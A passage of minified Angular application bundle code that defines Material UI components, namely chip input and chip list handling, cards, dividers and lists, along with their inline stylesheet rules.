e.preventDefault();this._focusLastChipOnBackspace=!1}this._emitChipEnd(e)}_keyup(e){!this._focusLastChipOnBackspace&&8===e.keyCode&&this.empty&&(this._focusLastChipOnBackspace=!0,e.preventDefault())}_blur(){this.addOnBlur&&this._emitChipEnd(),this.focused=!1,this._chipList.focused||this._chipList._blur(),this._chipList.stateChanges.next()}_focus(){this.focused=!0,this._focusLastChipOnBackspace=this.empty,this._chipList.stateChanges.next()}_emitChipEnd(e){!this.inputElement.value&&!!e&&this._chipList._keydown(e),(!e||this._isSeparatorKey(e))&&(this.chipEnd.emit({input:this.inputElement,value:this.inputElement.value,chipInput:this}),null==e||e.preventDefault())}_onInput(){this._chipList.stateChanges.next()}focus(e){this.inputElement.focus(e)}clear(){this.inputElement.value="",this._focusLastChipOnBackspace=!0}_isSeparatorKey(e){return!es(e)&&new Set(this.separatorKeyCodes).has(e.keyCode)}}return t.\u0275fac=function(e){return new(e||t)(Ee(mi),Ee(FF))},t.\u0275dir=Ot({type:t,selectors:[["input","matChipInputFor",""]],hostAttrs:[1,"mat-chip-input","mat-input-element"],hostVars:5,hostBindings:function(e,i){1&e&&he("keydown",function(r){return i._keydown(r)})("keyup",function(r){return i._keyup(r)})("blur",function(){return i._blur()})("focus",function(){return i._focus()})("input",function(){return i._onInput()}),2&e&&(Gs("id",i.id),Rt("disabled",i.disabled||null)("placeholder",i.placeholder||null)("aria-invalid",i._chipList&&i._chipList.ngControl?i._chipList.ngControl.invalid:null)("aria-required",i._chipList&&i._chipList.required||null))},inputs:{chipList:["matChipInputFor","chipList"],addOnBlur:["matChipInputAddOnBlur","addOnBlur"],separatorKeyCodes:["matChipInputSeparatorKeyCodes","separatorKeyCodes"],placeholder:"placeholder",id:"id",disabled:"disabled"},outputs:{chipEnd:"matChipInputTokenEnd"},exportAs:["matChipInput","matChipInputFor"],features:[sa]}),t})();const q0e=Uw(class{constructor(t,a,e,i){this._defaultErrorStateMatcher=t,this._parentForm=a,this._parentFormGroup=e,this.ngControl=i,this.stateChanges=new J}});let G0e=0;class j0e{constructor(a,e){this.source=a,this.value=e}}let m8=(()=>{class t extends q0e{constructor(e,i,n,r,c,d,T){super(d,r,c,T),this._elementRef=e,this._changeDetectorRef=i,this._dir=n,this.controlType="mat-chip-list",this._lastDestroyedChipIndex=null,this._destroyed=new J,this._uid="mat-chip-list-"+G0e++,this._tabIndex=0,this._userTabIndex=null,this._onTouched=()=>{},this._onChange=()=>{},this._multiple=!1,this._compareWith=(k,q)=>k===q,this._disabled=!1,this.ariaOrientation="horizontal",this._selectable=!0,this.change=new Tt,this.valueChange=new Tt,this.ngControl&&(this.ngControl.valueAccessor=this)}get selected(){var e,i;return this.multiple?(null===(e=this._selectionModel)||void 0===e?void 0:e.selected)||[]:null===(i=this._selectionModel)||void 0===i?void 0:i.selected[0]}get role(){return this._explicitRole?this._explicitRole:this.empty?null:"listbox"}set role(e){this._explicitRole=e}get multiple(){return this._multiple}set multiple(e){this._multiple=wi(e),this._syncChipsState()}get compareWith(){return this._compareWith}set compareWith(e){this._compareWith=e,this._selectionModel&&this._initializeSelection()}get value(){return this._value}set value(e){this.writeValue(e),this._value=e}get id(){return this._chipInput?this._chipInput.id:this._uid}get required(){var e,i,n,r;return null!==(r=null!==(e=this._required)&&void 0!==e?e:null===(n=null===(i=this.ngControl)||void 0===i?void 0:i.control)||void 0===n?void 0:n.hasValidator(Td.required))&&void 0!==r&&r}set required(e){this._required=wi(e),this.stateChanges.next()}get placeholder(){return this._chipInput?this._chipInput.placeholder:this._placeholder}set placeholder(e){this._placeholder=e,this.stateChanges.next()}get focused(){return this._chipInput&&this._chipInput.focused||this._hasFocusedChip()}get empty(){return(!this._chipInput||this._chipInput.empty)&&(!this.chips||0===this.chips.length)}get shouldLabelFloat(){return!this.empty||this.focused}get disabled(){return this.ngControl?!!this.ngControl.disabled:this._disabled}set disabled(e){this._disabled=wi(e),this._syncChipsState()}get selectable(){return this._selectable}set selectable(e){this._selectable=wi(e),this._syncChipsState()}set tabIndex(e){this._userTabIndex=e,this._tabIndex=e}get chipSelectionChanges(){return ra(...this.chips.map(e=>e.selectionChange))}get chipFocusChanges(){return ra(...this.chips.map(e=>e._onFocus))}get chipBlurChanges(){return ra(...this.chips.map(e=>e._onBlur))}get chipRemoveChanges(){return ra(...this.chips.map(e=>e.destroyed))}ngAfterContentInit(){this._keyManager=new L1(this.chips).withWrap().withVerticalOrientation().withHomeAndEnd().withHorizontalOrientation(this._dir?this._dir.value:"ltr"),this._dir&&this._dir.change.pipe(ea(this._destroyed)).subscribe(e=>this._keyManager.withHorizontalOrientation(e)),this._keyManager.tabOut.pipe(ea(this._destroyed)).subscribe(()=>{this._allowFocusEscape()}),this.chips.changes.pipe(Ro(null),ea(this._destroyed)).subscribe(()=>{(this.disabled||!this.selectable)&&Promise.resolve().then(()=>{this._syncChipsState()}),this._resetChips(),this._initializeSelection(),this._updateTabIndex(),this._updateFocusForDestroyedChips(),this.stateChanges.next()})}ngOnInit(){this._selectionModel=new I1(this.multiple,void 0,!1),this.stateChanges.next()}ngDoCheck(){this.ngControl&&(this.updateErrorState(),this.ngControl.disabled!==this._disabled&&(this.disabled=!!this.ngControl.disabled))}ngOnDestroy(){this._destroyed.next(),this._destroyed.complete(),this.stateChanges.complete(),this._dropSubscriptions()}registerInput(e){this._chipInput=e,this._elementRef.nativeElement.setAttribute("data-mat-chip-input",e.id)}setDescribedByIds(e){e.length?this._elementRef.nativeElement.setAttribute("aria-describedby",e.join(" ")):this._elementRef.nativeElement.removeAttribute("aria-describedby")}writeValue(e){this.chips&&this._setSelectionByValue(e,!1)}registerOnChange(e){this._onChange=e}registerOnTouched(e){this._onTouched=e}setDisabledState(e){this.disabled=e,this.stateChanges.next()}onContainerClick(e){this._originatesFromChip(e)||this.focus()}focus(e){this.disabled||this._chipInput&&this._chipInput.focused||(this.chips.length>0?(this._keyManager.setFirstItemActive(),this.stateChanges.next()):(this._focusInput(e),this.stateChanges.next()))}_focusInput(e){this._chipInput&&this._chipInput.focus(e)}_keydown(e){const i=e.target;i&&i.classList.contains("mat-chip")&&(this._keyManager.onKeydown(e),this.stateChanges.next())}_updateTabIndex(){this._tabIndex=this._userTabIndex||(0===this.chips.length?-1:0)}_updateFocusForDestroyedChips(){if(null!=this._lastDestroyedChipIndex)if(this.chips.length){const e=Math.min(this._lastDestroyedChipIndex,this.chips.length-1);this._keyManager.setActiveItem(e)}else this.focus();this._lastDestroyedChipIndex=null}_isValidIndex(e){return e>=0&&e<this.chips.length}_setSelectionByValue(e,i=!0){if(this._clearSelection(),this.chips.forEach(n=>n.deselect()),Array.isArray(e))e.forEach(n=>this._selectValue(n,i)),this._sortValues();else{const n=this._selectValue(e,i);n&&i&&this._keyManager.setActiveItem(n)}}_selectValue(e,i=!0){const n=this.chips.find(r=>null!=r.value&&this._compareWith(r.value,e));return n&&(i?n.selectViaInteraction():n.select(),this._selectionModel.select(n)),n}_initializeSelection(){Promise.resolve().then(()=>{(this.ngControl||this._value)&&(this._setSelectionByValue(this.ngControl?this.ngControl.value:this._value,!1),this.stateChanges.next())})}_clearSelection(e){this._selectionModel.clear(),this.chips.forEach(i=>{i!==e&&i.deselect()}),this.stateChanges.next()}_sortValues(){this._multiple&&(this._selectionModel.clear(),this.chips.forEach(e=>{e.selected&&this._selectionModel.select(e)}),this.stateChanges.next())}_propagateChanges(e){let i=null;i=Array.isArray(this.selected)?this.selected.map(n=>n.value):this.selected?this.selected.value:e,this._value=i,this.change.emit(new j0e(this,i)),this.valueChange.emit(i),this._onChange(i),this._changeDetectorRef.markForCheck()}_blur(){this._hasFocusedChip()||this._keyManager.setActiveItem(-1),this.disabled||(this._chipInput?setTimeout(()=>{this.focused||this._markAsTouched()}):this._markAsTouched())}_markAsTouched(){this._onTouched(),this._changeDetectorRef.markForCheck(),this.stateChanges.next()}_allowFocusEscape(){-1!==this._tabIndex&&(this._tabIndex=-1,setTimeout(()=>{this._tabIndex=this._userTabIndex||0,this._changeDetectorRef.markForCheck()}))}_resetChips(){this._dropSubscriptions(),this._listenToChipsFocus(),this._listenToChipsSelection(),this._listenToChipsRemoved()}_dropSubscriptions(){this._chipFocusSubscription&&(this._chipFocusSubscription.unsubscribe(),this._chipFocusSubscription=null),this._chipBlurSubscription&&(this._chipBlurSubscription.unsubscribe(),this._chipBlurSubscription=null),this._chipSelectionSubscription&&(this._chipSelectionSubscription.unsubscribe(),this._chipSelectionSubscription=null),this._chipRemoveSubscription&&(this._chipRemoveSubscription.unsubscribe(),this._chipRemoveSubscription=null)}_listenToChipsSelection(){this._chipSelectionSubscription=this.chipSelectionChanges.subscribe(e=>{e.source.selected?this._selectionModel.select(e.source):this._selectionModel.deselect(e.source),this.multiple||this.chips.forEach(i=>{!this._selectionModel.isSelected(i)&&i.selected&&i.deselect()}),e.isUserInput&&this._propagateChanges()})}_listenToChipsFocus(){this._chipFocusSubscription=this.chipFocusChanges.subscribe(e=>{let i=this.chips.toArray().indexOf(e.chip);this._isValidIndex(i)&&this._keyManager.updateActiveItem(i),this.stateChanges.next()}),this._chipBlurSubscription=this.chipBlurChanges.subscribe(()=>{this._blur(),this.stateChanges.next()})}_listenToChipsRemoved(){this._chipRemoveSubscription=this.chipRemoveChanges.subscribe(e=>{const i=e.chip,n=this.chips.toArray().indexOf(e.chip);this._isValidIndex(n)&&i._hasFocus&&(this._lastDestroyedChipIndex=n)})}_originatesFromChip(e){let i=e.target;for(;i&&i!==this._elementRef.nativeElement;){if(i.classList.contains("mat-chip"))return!0;i=i.parentElement}return!1}_hasFocusedChip(){return this.chips&&this.chips.some(e=>e._hasFocus)}_syncChipsState(){this.chips&&this.chips.forEach(e=>{e._chipListDisabled=this._disabled,e._chipListMultiple=this.multiple,e.chipListSelectable=this._selectable})}}return t.\u0275fac=function(e){return new(e||t)(Ee(mi),Ee(Ma),Ee(Cr,8),Ee(y1,8),Ee(lg,8),Ee(mp),Ee(fm,10))},t.\u0275cmp=Wt({type:t,selectors:[["mat-chip-list"]],contentQueries:function(e,i,n){if(1&e&&fa(n,db,5),2&e){let r;Vt(r=Bt())&&(i.chips=r)}},hostAttrs:[1,"mat-chip-list"],hostVars:14,hostBindings:function(e,i){1&e&&he("focus",function(){return i.focus()})("blur",function(){return i._blur()})("keydown",function(r){return i._keydown(r)}),2&e&&(Gs("id",i._uid),Rt("tabindex",i.disabled?null:i._tabIndex)("aria-required",i.role?i.required:null)("aria-disabled",i.disabled.toString())("aria-invalid",i.errorState)("aria-multiselectable",i.multiple)("role",i.role)("aria-orientation",i.ariaOrientation),Ct("mat-chip-list-disabled",i.disabled)("mat-chip-list-invalid",i.errorState)("mat-chip-list-required",i.required))},inputs:{role:"role",userAriaDescribedBy:["aria-describedby","userAriaDescribedBy"],errorStateMatcher:"errorStateMatcher",multiple:"multiple",compareWith:"compareWith",value:"value",required:"required",placeholder:"placeholder",disabled:"disabled",ariaOrientation:["aria-orientation","ariaOrientation"],selectable:"selectable",tabIndex:"tabIndex"},outputs:{change:"change",valueChange:"valueChange"},exportAs:["matChipList"],features:[ki([{provide:sb,useExisting:t}]),ci],ngContentSelectors:W0e,decls:2,vars:0,consts:[[1,"mat-chip-list-wrapper"]],template:function(e,i){1&e&&(Jn(),m(0,"div",0),va(1),u())},styles:['.mat-chip{position:relative;box-sizing:border-box;-webkit-tap-highlight-color:rgba(0,0,0,0);border:none;-webkit-appearance:none;-moz-appearance:none}.mat-chip::before{margin:calc(calc(var(--mat-focus-indicator-border-width, 3px) + 2px) * -1)}.mat-standard-chip{transition:box-shadow 280ms cubic-bezier(0.4, 0, 0.2, 1);display:inline-flex;padding:7px 12px;border-radius:16px;align-items:center;cursor:default;min-height:32px;height:1px}.mat-standard-chip._mat-animation-noopable{transition:none !important;animation:none !important}.mat-standard-chip .mat-chip-remove{border:none;-webkit-appearance:none;-moz-appearance:none;padding:0;background:none}.mat-standard-chip .mat-chip-remove.mat-icon,.mat-standard-chip .mat-chip-remove .mat-icon{width:18px;height:18px;font-size:18px}.mat-standard-chip::after{top:0;left:0;right:0;bottom:0;position:absolute;border-radius:inherit;opacity:0;content:"";pointer-events:none;transition:opacity 200ms cubic-bezier(0.35, 0, 0.25, 1)}.mat-standard-chip:hover::after{opacity:.12}.mat-standard-chip:focus{outline:none}.mat-standard-chip:focus::after{opacity:.16}.cdk-high-contrast-active .mat-standard-chip{outline:solid 1px}.cdk-high-contrast-active .mat-standard-chip.mat-chip-selected{outline-width:3px}.mat-standard-chip.mat-chip-disabled::after{opacity:0}.mat-standard-chip.mat-chip-disabled .mat-chip-remove,.mat-standard-chip.mat-chip-disabled .mat-chip-trailing-icon{cursor:default}.mat-standard-chip.mat-chip-with-trailing-icon.mat-chip-with-avatar,.mat-standard-chip.mat-chip-with-avatar{padding-top:0;padding-bottom:0}.mat-standard-chip.mat-chip-with-trailing-icon.mat-chip-with-avatar{padding-right:8px;padding-left:0}[dir=rtl] .mat-standard-chip.mat-chip-with-trailing-icon.mat-chip-with-avatar{padding-left:8px;padding-right:0}.mat-standard-chip.mat-chip-with-trailing-icon{padding-top:7px;padding-bottom:7px;padding-right:8px;padding-left:12px}[dir=rtl] .mat-standard-chip.mat-chip-with-trailing-icon{padding-left:8px;padding-right:12px}.mat-standard-chip.mat-chip-with-avatar{padding-left:0;padding-right:12px}[dir=rtl] .mat-standard-chip.mat-chip-with-avatar{padding-right:0;padding-left:12px}.mat-standard-chip .mat-chip-avatar{width:24px;height:24px;margin-right:8px;margin-left:4px}[dir=rtl] .mat-standard-chip .mat-chip-avatar{margin-left:8px;margin-right:4px}.mat-standard-chip .mat-chip-remove,.mat-standard-chip .mat-chip-trailing-icon{width:18px;height:18px;cursor:pointer}.mat-standard-chip .mat-chip-remove,.mat-standard-chip .mat-chip-trailing-icon{margin-left:8px;margin-right:0}[dir=rtl] .mat-standard-chip .mat-chip-remove,[dir=rtl] .mat-standard-chip .mat-chip-trailing-icon{margin-right:8px;margin-left:0}.mat-chip-ripple{top:0;left:0;right:0;bottom:0;position:absolute;pointer-events:none;border-radius:inherit;overflow:hidden;transform:translateZ(0)}.mat-chip-list-wrapper{display:flex;flex-direction:row;flex-wrap:wrap;align-items:center;margin:-4px}.mat-chip-list-wrapper input.mat-input-element,.mat-chip-list-wrapper .mat-standard-chip{margin:4px}.mat-chip-list-stacked .mat-chip-list-wrapper{flex-direction:column;align-items:flex-start}.mat-chip-list-stacked .mat-chip-list-wrapper .mat-standard-chip{width:100%}.mat-chip-avatar{border-radius:50%;justify-content:center;align-items:center;display:flex;overflow:hidden;object-fit:cover}input.mat-chip-input{width:150px;margin:4px;flex:1 0 150px}'],encapsulation:2,changeDetection:0}),t})(),BF=(()=>{class t{}return t.\u0275fac=function(e){return new(e||t)},t.\u0275mod=yi({type:t}),t.\u0275inj=Ci({providers:[mp,{provide:FF,useValue:{separatorKeyCodes:[13]}}],imports:[la]}),t})();const Q0e=["*",[["mat-card-footer"]]],$0e=["*","mat-card-footer"];let HF=(()=>{class t{}return t.\u0275fac=function(e){return new(e||t)},t.\u0275dir=Ot({type:t,selectors:[["mat-card-content"],["","mat-card-content",""],["","matCardContent",""]],hostAttrs:[1,"mat-card-content"]}),t})(),UF=(()=>{class t{}return t.\u0275fac=function(e){return new(e||t)},t.\u0275dir=Ot({type:t,selectors:[["mat-card-title"],["","mat-card-title",""],["","matCardTitle",""]],hostAttrs:[1,"mat-card-title"]}),t})(),K0e=(()=>{class t{constructor(){this.align="start"}}return t.\u0275fac=function(e){return new(e||t)},t.\u0275dir=Ot({type:t,selectors:[["mat-card-actions"]],hostAttrs:[1,"mat-card-actions"],hostVars:2,hostBindings:function(e,i){2&e&&Ct("mat-card-actions-align-end","end"===i.align)},inputs:{align:"align"},exportAs:["matCardActions"]}),t})(),qF=(()=>{class t{constructor(e){this._animationMode=e}}return t.\u0275fac=function(e){return new(e||t)(Ee(ar,8))},t.\u0275cmp=Wt({type:t,selectors:[["mat-card"]],hostAttrs:[1,"mat-card","mat-focus-indicator"],hostVars:2,hostBindings:function(e,i){2&e&&Ct("_mat-animation-noopable","NoopAnimations"===i._animationMode)},exportAs:["matCard"],ngContentSelectors:$0e,decls:2,vars:0,template:function(e,i){1&e&&(Jn(Q0e),va(0),va(1,1))},styles:[".mat-card{transition:box-shadow 280ms cubic-bezier(0.4, 0, 0.2, 1);display:block;position:relative;padding:16px;border-radius:4px}.mat-card._mat-animation-noopable{transition:none !important;animation:none !important}.mat-card>.mat-divider-horizontal{position:absolute;left:0;width:100%}[dir=rtl] .mat-card>.mat-divider-horizontal{left:auto;right:0}.mat-card>.mat-divider-horizontal.mat-divider-inset{position:static;margin:0}[dir=rtl] .mat-card>.mat-divider-horizontal.mat-divider-inset{margin-right:0}.cdk-high-contrast-active .mat-card{outline:solid 1px}.mat-card-actions,.mat-card-subtitle,.mat-card-content{display:block;margin-bottom:16px}.mat-card-title{display:block;margin-bottom:8px}.mat-card-actions{margin-left:-8px;margin-right:-8px;padding:8px 0}.mat-card-actions-align-end{display:flex;justify-content:flex-end}.mat-card-image{width:calc(100% + 32px);margin:0 -16px 16px -16px;display:block;overflow:hidden}.mat-card-image img{width:100%}.mat-card-footer{display:block;margin:0 -16px -16px -16px}.mat-card-actions .mat-button,.mat-card-actions .mat-raised-button,.mat-card-actions .mat-stroked-button{margin:0 8px}.mat-card-header{display:flex;flex-direction:row}.mat-card-header .mat-card-title{margin-bottom:12px}.mat-card-header-text{margin:0 16px}.mat-card-avatar{height:40px;width:40px;border-radius:50%;flex-shrink:0;object-fit:cover}.mat-card-title-group{display:flex;justify-content:space-between}.mat-card-sm-image{width:80px;height:80px}.mat-card-md-image{width:112px;height:112px}.mat-card-lg-image{width:152px;height:152px}.mat-card-xl-image{width:240px;height:240px;margin:-8px}.mat-card-title-group>.mat-card-xl-image{margin:-8px 0 8px}@media(max-width: 599px){.mat-card-title-group{margin:0}.mat-card-xl-image{margin-left:0;margin-right:0}}.mat-card>:first-child,.mat-card-content>:first-child{margin-top:0}.mat-card>:last-child:not(.mat-card-footer),.mat-card-content>:last-child:not(.mat-card-footer){margin-bottom:0}.mat-card-image:first-child{margin-top:-16px;border-top-left-radius:inherit;border-top-right-radius:inherit}.mat-card>.mat-card-actions:last-child{margin-bottom:-8px;padding-bottom:0}.mat-card-actions:not(.mat-card-actions-align-end) .mat-button:first-child,.mat-card-actions:not(.mat-card-actions-align-end) .mat-raised-button:first-child,.mat-card-actions:not(.mat-card-actions-align-end) .mat-stroked-button:first-child{margin-left:0;margin-right:0}.mat-card-actions-align-end .mat-button:last-child,.mat-card-actions-align-end .mat-raised-button:last-child,.mat-card-actions-align-end .mat-stroked-button:last-child{margin-left:0;margin-right:0}.mat-card-title:not(:first-child),.mat-card-subtitle:not(:first-child){margin-top:-4px}.mat-card-header .mat-card-subtitle:not(:first-child){margin-top:-8px}.mat-card>.mat-card-xl-image:first-child{margin-top:-8px}.mat-card>.mat-card-xl-image:last-child{margin-bottom:-8px}"],encapsulation:2,changeDetection:0}),t})(),aA=(()=>{class t{}return t.\u0275fac=function(e){return new(e||t)},t.\u0275mod=yi({type:t}),t.\u0275inj=Ci({imports:[la,la]}),t})(),pp=(()=>{class t{constructor(){this._vertical=!1,this._inset=!1}get vertical(){return this._vertical}set vertical(e){this._vertical=wi(e)}get inset(){return this._inset}set inset(e){this._inset=wi(e)}}return t.\u0275fac=function(e){return new(e||t)},t.\u0275cmp=Wt({type:t,selectors:[["mat-divider"]],hostAttrs:["role","separator",1,"mat-divider"],hostVars:7,hostBindings:function(e,i){2&e&&(Rt("aria-orientation",i.vertical?"vertical":"horizontal"),Ct("mat-divider-vertical",i.vertical)("mat-divider-horizontal",!i.vertical)("mat-divider-inset",i.inset))},inputs:{vertical:"vertical",inset:"inset"},decls:0,vars:0,template:function(e,i){},styles:[".mat-divider{display:block;margin:0;border-top-width:1px;border-top-style:solid}.mat-divider.mat-divider-vertical{border-top:0;border-right-width:1px;border-right-style:solid}.mat-divider.mat-divider-inset{margin-left:80px}[dir=rtl] .mat-divider.mat-divider-inset{margin-left:auto;margin-right:80px}"],encapsulation:2,changeDetection:0}),t})(),u8=(()=>{class t{}return t.\u0275fac=function(e){return new(e||t)},t.\u0275mod=yi({type:t}),t.\u0275inj=Ci({imports:[la,la]}),t})();const GF=["*"],X0e=[[["","mat-list-avatar",""],["","mat-list-icon",""],["","matListAvatar",""],["","matListIcon",""]],[["","mat-line",""],["","matLine",""]],"*"],Y0e=["[mat-list-avatar], [mat-list-icon], [matListAvatar], [matListIcon]","[mat-line], [matLine]","*"],i1e=Zc(El(class{})),a1e=El(class{}),QF=new ni("MatList"),n1e=new ni("MatNavList");let ts=(()=>{class t extends i1e{constructor(e){super(),this._elementRef=e,this._stateChanges=new J,"action-list"===this._getListType()&&(e.nativeElement.classList.add("mat-action-list"),e.nativeElement.setAttribute("role","group"))}_getListType(){const e=this._elementRef.nativeElement.nodeName.toLowerCase();return"mat-list"===e?"list":"mat-action-list"===e?"action-list":null}ngOnChanges(){this._stateChanges.next()}ngOnDestroy(){this._stateChanges.complete()}}return t.\u0275fac=function(e){return new(e||t)(Ee(mi))},t.\u0275cmp=Wt({type:t,selectors:[["mat-list"],["mat-action-list"]],hostAttrs:[1,"mat-list","mat-list-base"],inputs:{disableRipple:"disableRipple",disabled:"disabled"},exportAs:["matList"],features:[ki([{provide:QF,useExisting:t}]),ci,sa],ngContentSelectors:GF,decls:1,vars:0,template:function(e,i){1&e&&(Jn(),va(0))},styles:['.mat-subheader{display:flex;box-sizing:border-box;padding:16px;align-items:center}.mat-list-base .mat-subheader{margin:0}button.mat-list-item,button.mat-list-option{padding:0;width:100%;background:none;color:inherit;border:none;outline:inherit;-webkit-tap-highlight-color:rgba(0,0,0,0);text-align:left}[dir=rtl] button.mat-list-item,[dir=rtl] button.mat-list-option{text-align:right}button.mat-list-item::-moz-focus-inner,button.mat-list-option::-moz-focus-inner{border:0}.mat-list-base{padding-top:8px;display:block;-webkit-tap-highlight-color:rgba(0,0,0,0)}.mat-list-base .mat-subheader{height:48px;line-height:16px}.mat-list-base .mat-subheader:first-child{margin-top:-8px}.mat-list-base .mat-list-item,.mat-list-base .mat-list-option{display:block;height:48px;-webkit-tap-highlight-color:rgba(0,0,0,0);width:100%;padding:0}.mat-list-base .mat-list-item .mat-list-item-content,.mat-list-base .mat-list-option .mat-list-item-content{display:flex;flex-direction:row;align-items:center;box-sizing:border-box;padding:0 16px;position:relative;height:inherit}.mat-list-base .mat-list-item .mat-list-item-content-reverse,.mat-list-base .mat-list-option .mat-list-item-content-reverse{display:flex;align-items:center;padding:0 16px;flex-direction:row-reverse;justify-content:space-around}.mat-list-base .mat-list-item .mat-list-item-ripple,.mat-list-base .mat-list-option .mat-list-item-ripple{display:block;top:0;left:0;right:0;bottom:0;position:absolute;pointer-events:none}.mat-list-base .mat-list-item.mat-list-item-with-avatar,.mat-list-base .mat-list-option.mat-list-item-with-avatar{height:56px}.mat-list-base .mat-list-item.mat-2-line,.mat-list-base .mat-list-option.mat-2-line{height:72px}.mat-list-base .mat-list-item.mat-3-line,.mat-list-base .mat-list-option.mat-3-line{height:88px}.mat-list-base .mat-list-item.mat-multi-line,.mat-list-base .mat-list-option.mat-multi-line{height:auto}.mat-list-base .mat-list-item.mat-multi-line .mat-list-item-content,.mat-list-base .mat-list-option.mat-multi-line .mat-list-item-content{padding-top:16px;padding-bottom:16px}.mat-list-base .mat-list-item .mat-list-text,.mat-list-base .mat-list-option .mat-list-text{display:flex;flex-direction:column;flex:auto;box-sizing:border-box;overflow:hidden;padding:0}.mat-list-base .mat-list-item .mat-list-text>*,.mat-list-base .mat-list-option .mat-list-text>*{margin:0;padding:0;font-weight:normal;font-size:inherit}.mat-list-base .mat-list-item .mat-list-text:empty,.mat-list-base .mat-list-option .mat-list-text:empty{display:none}.mat-list-base .mat-list-item.mat-list-item-with-avatar .mat-list-item-content .mat-list-text,.mat-list-base .mat-list-item.mat-list-option .mat-list-item-content .mat-list-text,.mat-list-base .mat-list-option.mat-list-item-with-avatar .mat-list-item-content .mat-list-text,.mat-list-base .mat-list-option.mat-list-option .mat-list-item-content .mat-list-text{padding-right:0;padding-left:16px}[dir=rtl] .mat-list-base .mat-list-item.mat-list-item-with-avatar .mat-list-item-content .mat-list-text,[dir=rtl] .mat-list-base .mat-list-item.mat-list-option .mat-list-item-content .mat-list-text,[dir=rtl] .mat-list-base .mat-list-option.mat-list-item-with-avatar .mat-list-item-content .mat-list-text,[dir=rtl] .mat-list-base .mat-list-option.mat-list-option .mat-list-item-content .mat-list-text{padding-right:16px;padding-left:0}.mat-list-base .mat-list-item.mat-list-item-with-avatar .mat-list-item-content-reverse .mat-list-text,.mat-list-base .mat-list-item.mat-list-option .mat-list-item-content-reverse .mat-list-text,.mat-list-base .mat-list-option.mat-list-item-with-avatar .mat-list-item-content-reverse .mat-list-text,.mat-list-base .mat-list-option.mat-list-option .mat-list-item-content-reverse .mat-list-text{padding-left:0;padding-right:16px}[dir=rtl] .mat-list-base .mat-list-item.mat-list-item-with-avatar .mat-list-item-content-reverse .mat-list-text,[dir=rtl] .mat-list-base .mat-list-item.mat-list-option .mat-list-item-content-reverse .mat-list-text,[dir=rtl] .mat-list-base .mat-list-option.mat-list-item-with-avatar .mat-list-item-content-reverse .mat-list-text,[dir=rtl] .mat-list-base .mat-list-option.mat-list-option .mat-list-item-content-reverse .mat-list-text{padding-right:0;padding-left:16px}.mat-list-base .mat-list-item.mat-list-item-with-avatar.mat-list-option .mat-list-item-content-reverse .mat-list-text,.mat-list-base .mat-list-item.mat-list-item-with-avatar.mat-list-option .mat-list-item-content .mat-list-text,.mat-list-base .mat-list-option.mat-list-item-with-avatar.mat-list-option .mat-list-item-content-reverse .mat-list-text,.mat-list-base .mat-list-option.mat-list-item-with-avatar.mat-list-option .mat-list-item-content .mat-list-text{padding-right:16px;padding-left:16px}.mat-list-base .mat-list-item .mat-list-avatar,.mat-list-base .mat-list-option .mat-list-avatar{flex-shrink:0;width:40px;height:40px;border-radius:50%;object-fit:cover}.mat-list-base .mat-list-item .mat-list-avatar~.mat-divider-inset,.mat-list-base .mat-list-option .mat-list-avatar~.mat-divider-inset{margin-left:72px;width:calc(100% - 72px)}[dir=rtl] .mat-list-base .mat-list-item .mat-list-avatar~.mat-divider-inset,[dir=rtl] .mat-list-base .mat-list-option .mat-list-avatar~.mat-divider-inset{margin-left:auto;margin-right:72px}.mat-list-base .mat-list-item .mat-list-icon,.mat-list-base .mat-list-option .mat-list-icon{flex-shrink:0;width:24px;height:24px;font-size:24px;box-sizing:content-box;border-radius:50%;padding:4px}.mat-list-base .mat-list-item .mat-list-icon~.mat-divider-inset,.mat-list-base .mat-list-option .mat-list-icon~.mat-divider-inset{margin-left:64px;width:calc(100% - 64px)}[dir=rtl] .mat-list-base .mat-list-item .mat-list-icon~.mat-divider-inset,[dir=rtl] .mat-list-base .mat-list-option .mat-list-icon~.mat-divider-inset{margin-left:auto;margin-right:64px}.mat-list-base .mat-list-item .mat-divider,.mat-list-base .mat-list-option .mat-divider{position:absolute;bottom:0;left:0;width:100%;margin:0}[dir=rtl] .mat-list-base .mat-list-item .mat-divider,[dir=rtl] .mat-list-base .mat-list-option .mat-divider{margin-left:auto;margin-right:0}.mat-list-base .mat-list-item .mat-divider.mat-divider-inset,.mat-list-base .mat-list-option .mat-divider.mat-divider-inset{position:absolute}.mat-list-base[dense]{padding-top:4px;display:block}.mat-list-base[dense] .mat-subheader{height:40px;line-height:8px}.mat-list-base[dense] .mat-subheader:first-child{margin-top:-4px}.mat-list-base[dense] .mat-list-item,.mat-list-base[dense] .mat-list-option{display:block;height:40px;-webkit-tap-highlight-color:rgba(0,0,0,0);width:100%;padding:0}.mat-list-base[dense] .mat-list-item .mat-list-item-content,.mat-list-base[dense] .mat-list-option .mat-list-item-content{display:flex;flex-direction:row;align-items:center;box-sizing:border-box;padding:0 16px;position:relative;height:inherit}.mat-list-base[dense] .mat-list-item .mat-list-item-content-reverse,.mat-list-base[dense] .mat-list-option .mat-list-item-content-reverse{display:flex;align-items:center;padding:0 16px;flex-direction:row-reverse;justify-content:space-around}.mat-list-base[dense] .mat-list-item .mat-list-item-ripple,.mat-list-base[dense] .mat-list-option .mat-list-item-ripple{display:block;top:0;left:0;right:0;bottom:0;position:absolute;pointer-events:none}.mat-list-base[dense] .mat-list-item.mat-list-item-with-avatar,.mat-list-base[dense] .mat-list-option.mat-list-item-with-avatar{height:48px}.mat-list-base[dense] .mat-list-item.mat-2-line,.mat-list-base[dense] .mat-list-option.mat-2-line{height:60px}.mat-list-base[dense] .mat-list-item.mat-3-line,.mat-list-base[dense] .mat-list-option.mat-3-line{height:76px}.mat-list-base[dense] .mat-list-item.mat-multi-line,.mat-list-base[dense] .mat-list-option.mat-multi-line{height:auto}.mat-list-base[dense] .mat-list-item.mat-multi-line .mat-list-item-content,.mat-list-base[dense] .mat-list-option.mat-multi-line .mat-list-item-content{padding-top:16px;padding-bottom:16px}.mat-list-base[dense] .mat-list-item .mat-list-text,.mat-list-base[dense] .mat-list-option .mat-list-text{display:flex;flex-direction:column;flex:auto;box-sizing:border-box;overflow:hidden;padding:0}.mat-list-base[dense] .mat-list-item .mat-list-text>*,.mat-list-base[dense] .mat-list-option .mat-list-text>*{margin:0;padding:0;font-weight:normal;font-size:inherit}.mat-list-base[dense] .mat-list-item .mat-list-text:empty,.mat-list-base[dense] .mat-list-option .mat-list-text:empty{display:none}.mat-list-base[dense] .mat-list-item.mat-list-item-with-avatar .mat-list-item-content .mat-list-text,.mat-list-base[dense] .mat-list-item.mat-list-option .mat-list-item-content .mat-list-text,.mat-list-base[dense] 